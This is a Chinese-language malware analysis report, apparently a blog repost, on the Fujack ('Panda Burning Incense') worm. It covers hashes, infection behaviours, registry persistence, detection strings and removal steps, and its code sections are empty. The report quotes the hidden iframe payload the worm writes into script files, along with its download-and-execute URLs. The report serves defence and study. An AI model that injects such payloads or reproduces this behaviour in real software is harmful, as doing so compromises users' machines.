病毒分析报告-熊猫烧香

目录

1.样本概况

1.1 样本信息

1.2 测试环境及工具

1.3 分析目标

2.具体行为分析

2.1 主要恶意行为与代码分析

2.1.1 恶意程序对用户造成的危害

3.解决方案

3.1 提取病毒的特征,利用杀毒软件查杀

3.2 工具查杀思路

参考文献

1.样本概况

1.1 样本信息

病毒名称:Worm.Win32.Fujack.i

所属家族:Fujack

MD5值:5591324836B58B8E11CB61521E1A9B84

SHA1值:D8D82132318C614531864EE4EA553414B4480987

CRC32:F67C829D

编写语言:Delphi

壳:FSG v2.0

病毒恶意行为:

1、病毒将自身复制到C:/Windows/driver目录下

2、病毒在每个目录创建Desktop_.ini文件,文件内容为当前日期

3、病毒在C盘根目录创建autorun.inf文件,其中指定setup.exe自启动,后者即为病毒样本

4、病毒对程序目录下的exe等格式的文件进行感染,,图标变为熊猫烧香,打开被感染文件时,自动运行恶意代码

5、修改注册表项、隐藏病毒文件、设置病毒自启动、关闭杀毒软件服务

6、建立网络连接,在特定网址处下载更新病毒样本并执行

7、删除系统GHOST文件

8、根据名称关闭杀毒软件窗口、终结杀毒软件进程与部分系统进程(比如任务管理器、注册表编辑器),通过模拟按键关闭冰刃等安全软件

1.2 测试环境及工具

环境:Windows7

工具:IDA PRO、15PBOD、火绒剑、PEID等

1.3 分析目标

目标:分析病毒行为及实现过程,提取特征码、寻求解决方案

2.具体行为分析

2.1 主要恶意行为与代码分析

行为:病毒自我复制

关键代码:

行为:在每个目录创建Desktop_.ini文件

关键代码:

行为:C盘根目录创建autorun.inf、setup.exe文件

关键代码:

行为:感染指定格式的文件

关键代码:

检测可执行文件格式

感染exe等文件

检测脚本文件格式

感染脚本文件,向其中写入"<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>"\r\n 疑似用于访问特定网址

行为:修改注册表

关键代码:

设置病毒自启动与文件隐藏

关闭系统以及杀毒软件服务

行为:进行网络通讯

关键代码:

连接www.tom.com等知名网站,疑似测试网络环境

连接www.ac86.cn/66/up.txt,下载文件并执行

连接http://update.whboy.net/worm.txt,下载文件并执行

行为:删除系统GHOST文件

关键代码

行为:根据名称关闭防护软件窗口

关键代码

行为:根据名称终结防护软件进程

关键代码

行为:通过模拟按键关闭冰刃等安全软件

关键代码

2.1.1 恶意程序对用户造成的危害

特定后缀的文件内容被更改、文件图标被修改

被感染文件前7531h字节被病毒覆盖

被感染文件的原代码被保存在病毒代码之后

被感染文件最后被添加了被感染标识,包含原文件大小

无法使用注册表编辑器、任务管理器等工具

磁盘目录被写入病毒副本(setup.exe)以及自动启动程序(autorun.inf)以及其他文件(Desktop_.ini)

3.解决方案

3.1 提取病毒的特征,利用杀毒软件查杀

特征:

whboy

***武*汉*男*生*感*染*下*载*者***

www.ac86.cn/66/up.txt

http://update.whboy.net/worm.txt

3.2 工具查杀

根据其病毒行为该病毒查杀思路应该包括以下几个方面:

  1. 删除文件

关闭病毒进程

删除C:/Windows/driver目录下病毒样本spo0lsv.exe

删除C盘根目录的setup.exe以及自动启动程序autorun.inf

删除各个目录下Desktop_.ini

删除病毒从网络下载到c盘根目录的文件

2、修复注册表

删除病毒自启动和病毒隐藏注册表项(推荐用户手工修改)

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcshare

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

删除病毒创建的注册表项

HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\spo0lsv_RASMANCS

HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\spo0lsv_RASAPI32

恢复病毒删除的杀毒软件自启动注册表项

恢复病毒修改的网络设置相关启动项

3、根据受感染文件整体大小,病毒样本大小,被添加的后缀大小,计算受感染文件原代码在文件中的偏移,尝试修复文件

恢复被感染文件的代码

参考文献

[1] 15PB教研组. 恶意代码分析实例熊猫烧香.北京蓝森科技有限公司

猜你喜欢

转载自www.cnblogs.com/hell--world/p/11537205.html